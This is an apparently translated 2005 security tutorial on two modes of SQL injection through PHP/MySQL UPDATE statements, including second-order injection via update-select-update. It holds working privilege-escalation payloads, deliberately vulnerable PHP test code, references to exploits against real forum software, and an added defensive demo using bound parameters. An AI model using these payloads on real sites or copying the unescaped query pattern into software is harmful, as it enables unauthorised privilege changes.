Two modes of update injection (mysql+php)
Article/Security Angel · Superhei 2005.8.11
1. Test environment:
OS: Windows XP SP2
PHP: 4.3.10
MySQL: 4.1.9
Apache: 1.3.33
2. Test database structure:
-----Start---
-- Database: `test`
--
The script only changes the pass of user='heige'. If groudid represents the user's privilege level, our aim is to construct $p so that it also modifies groudid:
Then we submit: http://127.0.0.1/test1.php?p=123456,groudid=1
In MySQL:
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
|       1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
The groudid of user heige has gone from 2 to 1 :)
So an update injection where the variable is not wrapped in ' or " can succeed; this is our mode 1.
To close the ', the $p we construct would have to be submitted as 123456',groudid='2:
http://127.0.0.1/test2.php?p=123456',groudid='1 but with gpc=on the ' becomes \'
The submitted statement becomes: update userinfo set pass='123456\',groudid=\'1' where user='heige'
In MySQL:
mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user  | pass               |
+---------+-------+--------------------+
|       2 | heige | 123456',groudid='1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)
groudid has not been modified. So when the variable is wrapped in ' or ", can it not be injected at all? No. Let's look at mode 2:
<?php
// test3.php: $servername, $dbusername, $dbpassword and $dbname come from the config
// file, and $p from the query string (register_globals); neither is shown on this page.
mysql_connect($servername, $dbusername, $dbpassword) or die("database connection failed");
$sql = "update userinfo set pass='$p' where user='heige'";   // <-- $p is wrapped in single quotes
$result = mysql_db_query($dbname, $sql);                      // $p is written to the database
$sql = "select pass from userinfo where user='heige'";
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo $userinfo[0];                                            // the queried pass is now in $userinfo[0]
$sql = "update userinfo set pass='$userinfo[0]' where user='heige'";
$result = mysql_db_query($dbname, $sql);                      // update again with $userinfo[0], this time unescaped
?>
Let's test it; submit: http://127.0.0.1/test3.php?p=123456',groudid='1
Back in MySQL:
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
|       1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)
haha~~ the injection succeeded and groudid was changed to 1. This is our mode 2; in short it is:
update --> select --> update
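To make the mode 2 chain concrete, here is an added example (not the article's code) that replays update --> select --> update against an in-memory SQLite table shaped like the article's userinfo, beside the same chain with bound parameters. SQLite has no backslash string escapes, so the first hop doubles the quote in place of magic_quotes_gpc's \'; the effect is the same: the escaped payload is stored verbatim and later re-used without escaping.

```python
import sqlite3

# Constructed stand-in for the article's test database: one user, heige, groudid=2.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table userinfo (groudid integer, user text, pass text)")
    conn.execute("insert into userinfo values (2, 'heige', 'oldpass')")
    return conn

def escape(s):
    # First-hop escaping (the role magic_quotes_gpc plays in the article). SQLite
    # has no \' escape, so the quote is doubled instead; the payload is still
    # stored as a plain string, exactly as in the article's second test.
    return s.replace("'", "''")

def vulnerable_flow(conn, p):
    # Hop 1: escaped input; safe on its own, but it stores the raw payload in pass.
    conn.execute("update userinfo set pass='%s' where user='heige'" % escape(p))
    # Hop 2: read the value back; from here on the application treats it as trusted.
    (stored,) = conn.execute("select pass from userinfo where user='heige'").fetchone()
    # Hop 3: concatenate it into a new UPDATE with no escaping. The quote inside the
    # stored value closes the literal and ",groudid='1" becomes part of the statement.
    conn.execute("update userinfo set pass='%s' where user='heige'" % stored)
    return conn.execute("select groudid, pass from userinfo where user='heige'").fetchone()

def safe_flow(conn, p):
    # Same three hops with bound parameters: the stored value never reaches SQL syntax,
    # so it does not matter that it is read from the database rather than the request.
    conn.execute("update userinfo set pass=? where user='heige'", (p,))
    (stored,) = conn.execute("select pass from userinfo where user='heige'").fetchone()
    conn.execute("update userinfo set pass=? where user='heige'", (stored,))
    return conn.execute("select groudid, pass from userinfo where user='heige'").fetchone()

# The article's test3.php input, constructed here for the demonstration.
PAYLOAD = "123456',groudid='1"

if __name__ == "__main__":
    print("vulnerable:", vulnerable_flow(setup_db(), PAYLOAD))  # (1, '123456')
    print("safe:      ", safe_flow(setup_db(), PAYLOAD))        # (2, "123456',groudid='1")
```

The lesson for review is that escaping once at the request boundary does not cover statements built from values read back out of the database; every hop that concatenates data into SQL needs its own escaping, or better, a bound parameter.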
4. Real-world cases
Mode 1: discuz 2.0/2.2 register.php injection
Vulnerability analysis: http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register.php remote exploit: http://4ngel.net/project/discuz_reg.htm
Mode 2: phpwind 2.0.2 and 3.31e privilege elevation vulnerability
Vulnerability analysis:
update (in profile.php the injected variable is $proicon; the later UPDATE statement contains icon='$userdb[icon]')